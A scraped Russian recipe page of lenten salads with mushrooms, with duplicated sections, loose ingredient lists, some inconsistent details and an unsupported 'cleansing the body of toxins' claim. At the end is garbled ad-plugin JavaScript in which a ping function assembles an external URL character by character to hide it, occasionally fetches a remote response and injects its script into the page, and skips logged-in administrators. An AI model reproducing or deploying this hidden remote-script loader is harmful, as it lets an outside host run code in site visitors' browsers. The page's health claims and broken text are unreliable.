Постный салат с грибами

Постный салат с грибами

– вилок пекинской капусты;
– 150 грамм шампиньонов;
– 2 ст.л. оливкового масла;
– соль;
– 2 ст.л. соевого соуса;
– пол пучка лука зеленого;
– лимонный сок.

– 250 грамм маринованных шампиньонов,
– 1 луковица,
– 1 свежий огурец,
– 2-3 картошины,
– соль,
– черный перец,
– 1-2 ч.л. дижонской горчицы,
– пучок укропа,
– 2-3 ст.л. оливкового масла или заправки из-под грибов.

– капуста пекинская – 50 гр;
– картофель отварной – 2 шт;
– жареные грибы – 150 гр;
– огурцы соленые – 2 шт;
– масло растительное.

– пол кочана красной капусты;
– шесть грибочков;
– головка красного лука;
– пучок шпината;
– оливковое масло;
– соль – по вкусу;
– перец – по вкусу;
– специи.

– 2-3 свеклы;
– 4 картофелины;
– 2 моркови;
– 1 репчатый лук;
– 1/2 банки маринованных опят;
– 3 соленых огурца;
– 150 г квашеной капусты;
– 1 б. консервированной белой фасоли;
– растительное масло;
– черный перец и соль.

– пять картофелин;
– 150 гр свежих грибов;
– небольшая морковь;
– головка репчатого лука;
– пучок черемши;
– 30 мл растительного масла;
– 1 ч. ложка лимонного сока;
– соль – по вкусу;
– перец черный молотый – по вкусу.

– 6-7 картошин;
– 100-150 грамм шампиньонов;
– 1 луковица;
– 8-10 оливок;
– пучок зеленого лука;
– 3 ст.л. оливкового масла;
– 1-1,5 ст.л. лимонного сока;
– щепотка соли;
– щепотка сахара;
– 2-3 щепотки молотого черного перца.

– свекла – 1 шт.,
– редька – 0,5 целой,
– маринованные грибы – 50 г,
– морковь – 1 шт.,
– зеленый лук для украшения,
– растительное масло по вкусу.

– головка свежей редьки,
– два картофеля,
– треть банки консервированного горошка,
– треть банки маринованных грибов,
– зеленый лук.

– 150 гр свежих шампиньонов;
– 1 горсть квашеной капусты;
– 1 огурец соленый;
– 1 средняя головка лука;
– 4-5 картофелин вареных;
– 1-2 моркови вареных;
– 1 свекла вареная;
– 3-4 ст. л горошка консервированного;
– 4-5 ст. л. подсолнечного масла;
– 1 ч. л. горчицы с зернышками;
– 1-2 ч. л. уксуса яблочного или столового;
– перец черный молотый;
– соль, сахар – по вкусу.

– сыр;
– картошка;
– грибы;
– растительное масло;
– соль, молотый перец по вкусу.

– свекла – 200 грамм;
– маринованные грибы – 200 грамм;
– постный майонез – 100 грамм;
– соль – щепотка;
– лук – 150 грамм.

– 650 г белокочанной капусты,
– 130 г шампиньонов,
– две моркови,
– небольшая головка свеклы,
– две дольки чеснока,
– яблочный уксус – 2.5 ст. ложки,
– смесь специй для корейской моркови,
– сахар – 50 г,
– соль – 30 г,
– масло рафинированное – 100 мл,
– чили перец – по вкусу.

– 5 клубней картофеля,
– 150 г свежих шампиньонов,
– 3 маринованных огурца,
– половина стакана сухой фасоли,
– 1 пучок свежей зелени,
– 2 луковицы,
– 2 щепотки сахара,
– полторы ст.ложки уксуса,
– соль по вкусу,
– 4 ст.ложки растительного масла,
– черный молотый перец по вкусу и желанию.

– четыре картофелины,
– банка зеленого горошка,
– банка маринованных опят,
– пучок зелени,
– головка репчатого лука,
– масло растительное,
– соль,
– специи.

– свекла – 2 шт,
– морковь – 1 шт.,
– картофель – 1 шт.,
– маринованные грибы – 3 ст.ложки,
– столовый уксус – 1 ст.ложка,
– соленые огурцы – 2 шт.,
– растительное масло – 2 ст.ложки.

– небольшой кочан пекинской капусты,
– 200 грамм зеленой фасоли,
– 300 грамм грибов,
– головка красного лука,
– кусочек свежего имбиря,
– соевый соус – по вкусу,
– молотый черный перец – по вкусу,
– растительное масло.

– свекла – 1 шт.,
– маринованные шампиньоны – 120 г,
– квашеные огурцы – 3 шт.,
– морковь – 1 шт.,
– картофель – 2 шт.,
– лимонный сок – 1 ст.ложка,
– оливковое масло – 5 ст.ложек,
– зеленый лук – 5 перышек,
– перец по вкусу,
– соль по вкусу.

– 200 г молодой капусты,
– 1 красный болгарский перец
– 2 помидора,
– 200 г шампиньонов,
– 2 огурца,
– 1 зуб. чеснока,
– 1 ст. л. соевого соуса,
– 2 дольки лимона,
– растительное рафинированное масло,
– соль,
– 1 ст. л. соуса «Тартар».

– полстакана булгура;
– стакан очищенной воды;
– 4 ст. л. растительного масла;
– 2 щепотки соли;
– немного черного перца;
– 100-150 г маринованных грибов;
– небольшой пучок укропа;
– несколько перышек молодого лука.

Постное меню: 5 доступных и вкусных салатов

Постное меню — огромная польза для тела и души всех верующих. Отказ от скоромной пищи позволяет очистить организм от шлаков, наладить пищеварение за счет обилия в рационе растительной клетчатки. Чтобы еда во время поста оставалась вкусной, питательной и полезной, стоит почаще готовить блюда из разнообразных овощей, бобовых, грибов. Витаминные салаты становятся главными на столе постящихся. Несколько интересных идей для вкусных блюд — в вашу копилочку.

1. Салат с маринованными грибами и корейской морковью

Ингредиенты (6 порций, 360 ккал, 25 минут):

• 150 грамм к/с кукурузы;

• 150 грамм фасоли белой или красной в собственном соку;

• 400 грамм маринованных опят;

• 150 г острой морковки по-корейски;

• 1 веточка помидоров черри;

• 50 мл растительного масла или 200 грамм домашнего постного майонеза;

Приготовление

1. Со всех консервов слить жидкость. Фасоль промыть кипяченой водой, обсушить. Если опята крупные, порезать.

2. Грибы, кукурузу и фасоль соединить в салатнике. Длинную корейскую морковь укоротить, разрезав на несколько частей. Добавить в блюдо.

3. Солить не нужно, ведь маринованные опята и острая морковка уже приправлены солью. Салат заправить постным майонезом или оливковым (подсолнечным) маслом.

4. Сверху выложить крохотные черри, разрезанные пополам. По желанию — несколько листиков петрушки.

2. Слоеный салат с шампиньонами и черносливом

Ингредиенты (5 порций, 400 ккал, полчаса):

• 300 грамм шампиньонов;

• 1/2 стакана чернослива;

• 200 грамм репчатого лука;

• 100 грамм грецких орехов;

• 50 мл растительного масла;

• 200 грамм моркови;

• 1 пучок зелени и постный майонез для заправки.

Приготовление

1. Чернослив погрузить в миску с кипятком. Как размякнет (10-15 минут), вынуть и нашинковать тоненькими полосочками.

2. Ядра орехов прокалить на сухом противне, а затем прикрыть пергаментом и прокатать скалкой.

3. Морковь очистить и нашинковать такой же соломкой, как и чернослив. Протушить на постном масле до мягкости и легкой золотистости, но не пережаривать ни в коем случае.

4. Отдельно обжарить и протушить грибы, потом тоже отдельно — лук.

5. Подготовленные продукты для салата выложить на блюдо через кольцо, а можно — слоями в широкий стакан. Сначала морковь, потом лучок, дальше шампиньоны, чернослив. Орешки в конце.

6. Для пропитки каждый слой промазать постным майонезом, приготовленным без яиц. Измельченной зеленью дополнить вкусное блюдо перед самой подачей.

3. Салат с рисом и тунцом на Благовещение

Ингредиенты (5 порций, 100 ккал, 20 минут):

• рис «арборио» или любой другой рис — 100 грамм;

• тунец консервированный — 200 грамм;

• лимонный сок — 2 ст. ложки;

• огурчик свежий — 1 шт;

• лук сладкий красный — 1 шт;

• горошек зеленый — 2 ст. ложки;

• масло оливковое — 2 ст. ложки;

• томаты сорта «черри» — 5 шт.

Приготовление

1. Рис залить водой, добавить ложку растительного масла и соль — сварить до готовности. Переложить в салатник — пускай остывает.

2. Морковь отварить отдельно, не счищая кожуры. Как остынет, очистить и покрошить к рису, кубиками.

3. Произвольными дольками нарезать свежий огурец и томаты-черри. Сладкий лук — в виде полуколец.

4. Все нарезанные овощи переправить в салатник. Туда же горошек и заправку из лимонного сока, специй и масла оливы. Перемешать.

5. Тунца вынуть из банки и разделить вилкой на кусочки. Выложить сверху на салат, полить немного заправкой или соком из-под рыбы.

4. Салат «по-испански» с авокадо

Также подходит для праздничных дней в период Поста.

Ингредиенты (4 порции, 190 ккал, 25 минут):

• апельсин и авокадо — по 1 шт;

• маслины без косточек — 170 г;

• помидор свежий, крепкий и спелый — 1 шт;

• фиолетовая луковица — 1 шт;

• листовой салат — 1 пучок;

• французская (дижонская) горчица — 1/2 ст. ложки;

• яблочный уксус — 2 ч. ложки;

• растительное масло — 4 ст. ложки;

• соль на вкус, измельченный базилик.

Приготовление

1. Вымытый листовой салат порвать руками на небольшие кусочки. Выложить в тарелку.

2. Очистить апельсин, в том числе и от белых прожилок и пленок — порезать кусочками. Точно так порезать мякоть авокадо. Этот плод сначала разрезать пополам, вынуть крупную косточку, потом счистить кожицу, только потом нарезать.

3. Маслины и лук покрошить колечками, помидор нашинковать некрупными дольками. Все отправить в тарелку с салатом.

4. Сделать заливку из растительного масла, французской горчицы и плодового уксуса. Подсолить ее на свой вкус. Заправить кушанье и перемешать.

5. Простой картофельный салат с солеными огурцами

Можно заменять ингредиенты на ваш вкус: например, оливки заменить на имеющиеся грибы. Зеленый горошек также прекрасно подойдет к салату из картофеля и соленых огурцов.
Ингредиенты (5 порций, 105 ккал, 20 минут):

• картофель в кожуре — 500 грамм;

• огурцы соленые — 2 шт;

• красная салатная луковица — 1 шт;

• любая зелень — 30 грамм;

• зеленые или черные оливки — 150 грамм;

• винный уксус — по вкусу;

• масло оливковое или льняное — 3 ст. ложки;

• паприка, соль, зира, чабрец.

Приготовление

1. Картофель в кожуре потереть сеточкой и помыть. Поставить вариться — примерно 20 минут, ближе к концу посолить. Обсушить, почистить и как остынет, покрошить дольками.

2. Соленые огурцы можно очистить, а можно оставить с кожицей — как угодно. Порезать полукружками. Лук нарубить тонкой соломкой, измельчить свежую зелень.

3. Смешать для заправки винный уксус со всеми специями-приправами и растительным маслом. В заправку добавить мелко нарезанные оливки и перемешать.

4. Огурцы, картошку и лук выложить в салатник, полить соусом, добавить зелень и смешать. Простой картофельный салат готов!

Постное меню: 5 доступных и вкусных салатов

Постное меню — огромная польза для тела и души всех верующих. Отказ от скоромной пищи позволяет очистить организм от шлаков, наладить пищеварение за счет обилия в рационе растительной клетчатки. Чтобы еда во время поста оставалась вкусной, питательной и полезной, стоит почаще готовить блюда из разнообразных овощей, бобовых, грибов. Витаминные салаты становятся главными на столе постящихся. Несколько интересных идей для вкусных блюд — в вашу копилочку.

1. Салат с маринованными грибами и корейской морковью

Ингредиенты (6 порций, 360 ккал, 25 минут):

• 150 грамм к/с кукурузы;

• 150 грамм фасоли белой или красной в собственном соку;

• 400 грамм маринованных опят;

• 150 г острой морковки по-корейски;

• 1 веточка помидоров черри;

• 50 мл растительного масла или 200 грамм домашнего постного майонеза;

Приготовление

1. Со всех консервов слить жидкость. Фасоль промыть кипяченой водой, обсушить. Если опята крупные, порезать.

2. Грибы, кукурузу и фасоль соединить в салатнике. Длинную корейскую морковь укоротить, разрезав на несколько частей. Добавить в блюдо.

3. Солить не нужно, ведь маринованные опята и острая морковка уже приправлены солью. Салат заправить постным майонезом или оливковым (подсолнечным) маслом.

4. Сверху выложить крохотные черри, разрезанные пополам. По желанию — несколько листиков петрушки.

2. Слоеный салат с шампиньонами и черносливом

Ингредиенты (5 порций, 400 ккал, полчаса):

• 300 грамм шампиньонов;

• 1/2 стакана чернослива;

• 200 грамм репчатого лука;

• 100 грамм грецких орехов;

• 50 мл растительного масла;

• 200 грамм моркови;

• 1 пучок зелени и постный майонез для заправки.

Приготовление

1. Чернослив погрузить в миску с кипятком. Как размякнет (10-15 минут), вынуть и нашинковать тоненькими полосочками.

2. Ядра орехов прокалить на сухом противне, а затем прикрыть пергаментом и прокатать скалкой.

3. Морковь очистить и нашинковать такой же соломкой, как и чернослив. Протушить на постном масле до мягкости и легкой золотистости, но не пережаривать ни в коем случае.

4. Отдельно обжарить и протушить грибы, потом тоже отдельно — лук.

5. Подготовленные продукты для салата выложить на блюдо через кольцо, а можно — слоями в широкий стакан. Сначала морковь, потом лучок, дальше шампиньоны, чернослив. Орешки в конце.

6. Для пропитки каждый слой промазать постным майонезом, приготовленным без яиц. Измельченной зеленью дополнить вкусное блюдо перед самой подачей.

3. Салат с рисом и тунцом на Благовещение

Ингредиенты (5 порций, 100 ккал, 20 минут):

• рис «арборио» или любой другой рис — 100 грамм;

• тунец консервированный — 200 грамм;

• лимонный сок — 2 ст. ложки;

• огурчик свежий — 1 шт;

• лук сладкий красный — 1 шт;

• горошек зеленый — 2 ст. ложки;

• масло оливковое — 2 ст. ложки;

• томаты сорта «черри» — 5 шт.

Приготовление

1. Рис залить водой, добавить ложку растительного масла и соль — сварить до готовности. Переложить в салатник — пускай остывает.

2. Морковь отварить отдельно, не счищая кожуры. Как остынет, очистить и покрошить к рису, кубиками.

3. Произвольными дольками нарезать свежий огурец и томаты-черри. Сладкий лук — в виде полуколец.

4. Все нарезанные овощи переправить в салатник. Туда же горошек и заправку из лимонного сока, специй и масла оливы. Перемешать.

5. Тунца вынуть из банки и разделить вилкой на кусочки. Выложить сверху на салат, полить немного заправкой или соком из-под рыбы.

4. Салат «по-испански» с авокадо

Также подходит для праздничных дней в период Поста.

Ингредиенты (4 порции, 190 ккал, 25 минут):

• апельсин и авокадо — по 1 шт;

• маслины без косточек — 170 г;

• помидор свежий, крепкий и спелый — 1 шт;

• фиолетовая луковица — 1 шт;

• листовой салат — 1 пучок;

• французская (дижонская) горчица — 1/2 ст. ложки;

• яблочный уксус — 2 ч. ложки;

• растительное масло — 4 ст. ложки;

• соль на вкус, измельченный базилик.

Приготовление

1. Вымытый листовой салат порвать руками на небольшие кусочки. Выложить в тарелку.

2. Очистить апельсин, в том числе и от белых прожилок и пленок — порезать кусочками. Точно так порезать мякоть авокадо. Этот плод сначала разрезать пополам, вынуть крупную косточку, потом счистить кожицу, только потом нарезать.

3. Маслины и лук покрошить колечками, помидор нашинковать некрупными дольками. Все отправить в тарелку с салатом.

4. Сделать заливку из растительного масла, французской горчицы и плодового уксуса. Подсолить ее на свой вкус. Заправить кушанье и перемешать.

5. Простой картофельный салат с солеными огурцами

Можно заменять ингредиенты на ваш вкус: например, оливки заменить на имеющиеся грибы. Зеленый горошек также прекрасно подойдет к салату из картофеля и соленых огурцов.
Ингредиенты (5 порций, 105 ккал, 20 минут):

• картофель в кожуре — 500 грамм;

• огурцы соленые — 2 шт;

• красная салатная луковица — 1 шт;

• любая зелень — 30 грамм;

• зеленые или черные оливки — 150 грамм;

• винный уксус — по вкусу;

• масло оливковое или льняное — 3 ст. ложки;

• паприка, соль, зира, чабрец.

Приготовление

1. Картофель в кожуре потереть сеточкой и помыть. Поставить вариться — примерно 20 минут, ближе к концу посолить. Обсушить, почистить и как остынет, покрошить дольками.

2. Соленые огурцы можно очистить, а можно оставить с кожицей — как угодно. Порезать полукружками. Лук нарубить тонкой соломкой, измельчить свежую зелень.

3. Смешать для заправки винный уксус со всеми специями-приправами и растительным маслом. В заправку добавить мелко нарезанные оливки и перемешать.

4. Огурцы, картошку и лук выложить в салатник, полить соусом, добавить зелень и смешать. Простой картофельный салат готов!

Как вкусно приготовить постный салат с грибами

Осталось совсем немного времени до зимы, а уже на носу Рождественский пост. Держать посты не так-то уж и просто, приходится отказываться от молочной и мясной еды, а также яиц, мучной выпечки и так далее. Людям, постящимся впервые, на помощь приходят рецепты блюд, в которых нет скоромной еды. Они размещены на порталах интернета или в глянцевых журналах.

Существует множество постных салатов, в составе которых есть грибы. Недаром грибы называют постным мясом, они улучшают вкус блюд и обогащают организм человека полезными веществами.

Ингредиенты Количество
консервированная фасоль – 1 банка
грибы, лучше использовать шампиньоны – 250 грамм
репчатый лук – 1 штука
чеснок – 2 дольки
зелень – по вкусу
растительное масло – 50 грамм
соевый соус – по вкусу
Время приготовления: 20 минут Калорийность на 100 грамм: 90 Ккал

В этом рецепте вместо соли используется соевый соус, придающий пикантности салату. Еще его смело могут кушать все любители стройной фигуры.

Шампиньоны в этом салате используются свежие, их промывают под проточной водой и обсушивают. Лук нарезают на полукольца. На плиту затем кладется сковородка, добавляется предусмотренное рецептом растительное масло (в данном рецепте берется подсолнечное) и обжаривается сначала лук.

Туда добавляются грибы и обжариваются до тех пор, пока не выйдет вся влага из шампиньонов. В это же время необходимо открыть консервированную фасоль и вылить не употребляемую в салате жидкость. Консервированную фасоль каждый выбирает по своему вкусу, однако красного цвета фасоль в томатном соусе по своим вкусовым качествам больше подходит к этому блюду.

В глубокую салатницу выкладывается фасоль, затем сверху обжаренные с луком грибы, сверху покрошенная зелень и все залить соевым уксусом. Соевый уксус надо предварительно попробовать, если он слишком соленый, то лучше использовать 1-2 столовую ложки.

Затем через чесночницу нужно выдавить один зубчик чеснока. Те хозяйки, которые любят чеснок нарезать, пусть используют тогда его две или три дольки.

Затем все снова перемешать и оставить в таком виде настаиваться хотя бы на десять минут, только потом можно будет его попробовать.

Салат с шампиньонами и спаржей

В кулинарии используют белую и зеленую спаржу, у которых стебель довольно мясистый, а по вкусу она напоминает грибы, поэтому высоко ценится гурманами. Спаржа хороша и как отдельное блюдо и в составе салатов.

Для этого салата потребуется:

  • свежие шампиньоны —500 грамм;
  • спаржа —500 грамм;
  • лимон;
  • винный уксус —30 грамм;
  • подсолнечное масло — 60 грамм;
  • эстрагон — пол пучка;
  • петрушка — половина пучка;
  • укроп — 1/3 пучка.

На приготовление уходит минут тридцать.

Калорийность составляет 1309 ккал.

Сначала необходимо подготовить спаржу. Ее промывают под водой, начиная с середины, ножом снимают жесткие места, затем спаржу связывают в пучки по десять штук и варят в вертикальном положении в подсоленной воде восемь-десять минут.

Как только она сварится, спаржу следует переложить в дуршлаг и выждать, пока стечет вода. В это время подготавливаются шампиньоны. Грибы нарезаются и тушатся в небольшом количестве воды. Как только вода испарится, грибы следует посолить, поперчить и выжать на них сок лимона. Дать остыть.

Спаржу следует нарезать на небольшие кусочки, добавить грибы, винный уксус, петрушку, эстрагон, укроп, заправить подсолнечным или лучше оливковым маслом. Затем поставить в холодильник на два часа. Салат готов, его также используют в качестве закуски.

«Оливье» с грибами

  • картофель — 5 клубней;
  • грибы вешенки — 200 грамм;
  • две моркови;
  • свежий огурец;
  • два соленых огурца;
  • головка репчатого лука;
  • подсолнечное масло — 30 грамм;
  • консервированный зеленый горошек — 1 банка;
  • зелень по вкусу;
  • соль, перец по вкусу;
  • майонез постный —150 грамм.

На приготовление салата уходит, учитывая время на отваривание картофеля и моркови, приблизительно час.

Калорийность — 1020 ккал.

Картофель и морковь следует промыть и сварить в мундире. Вешенки нарезать и пожарить в подсолнечном масле. Все огурцы нарезаются на одинаковые кубики и затем смешиваются с остывшими грибами. Лук мелко нарезается или натирается на терке.

Картошку и морковку остудить, очистить и нарезать на кубики, смешать с огурцами и вешенками. Туда же добавляется зеленый горошек, нарезанную зелень, посолить, поперчить и смешать с майонезом.

Салат готов, по вкусу и виду очень напоминает «Оливье».

Читайте как приготовить спагетти с морепродуктами — очень вкусное блюдо.

Возьмите на заметку рецепт жаркого из говядины с картошкой.

Пошаговый рецепт с фото тушеной капусты с мясом.

Закуска по-венесуэльски

Сначала следует замариновать шампиньоны.

Состав для маринада:

  • шампиньоны —500 грамм;
  • яблочный уксус — 2 столовые ложки;
  • сахарный песок — 1столовая ложка;
  • соль — 1чайная ложка;
  • перец горошком — 10 штук;
  • чеснок — 6 зубчиков;
  • растительное масло — 120 грамм;
  • лавровый лист — 2 листика.

Времени на приготовление уходит 15 минут.

Калорийность составляет 1020 ккал.

Для этого грибы нужно промыть, протереть бумажным полотенцем и нарезать на половинки. В глубокую посуду налить подсолнечное масло, добавить уксус, нарезанный чеснок, положить лавровый лист, бросить перец горошком.

Следующим шагом масло следует посолить, добавить сахар, помешать, положить грибы и поставить на огонь. Как только закипит, сбавить огонь и поварить еще пять минут.

Остудить грибы, положить в банку и убрать в холодильник на четыре часа. Грибы получаются пикантного вкуса и хорошо сочетаются в данном рецепте.

В состав постного салата входят:

  • грибы по-венесуэльски — 300 грамм;
  • отварной картофель — 5 клубней;
  • две отварные моркови;
  • отварная свекла;
  • зеленое яблоко;
  • головка репчатого лука;
  • подсолнечное масло — 30 грамм;
  • майонез постный — 2 столовые ложки;
  • свежий огурец — 2 штуки;
  • половина пучка кинзы;
  • соль, перец по вкусу;

Времени на приготовление салата уходит минут двадцать.

Калорийность составляет 1942 ккал.

Лук следует мелко нарезать и добавить к маринованным грибам. Салат готовится слоями. На сервировочную тарелку сначала натирают половину картофеля, который нужно посолить и поперчить и следом выкладывают половину подготовленных грибов.

Следующим слоем натирается яблоко, затем немного моркови, свежего огурца, и две трети отварной свеклы. Каждый слой промазывается майонезом. Затем процедура повторяется. Опять картошка, грибы, яблоко, морковь, огурец. Все смазывается майонезом и в конце натирается свекла. Украшается салат зеленью.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};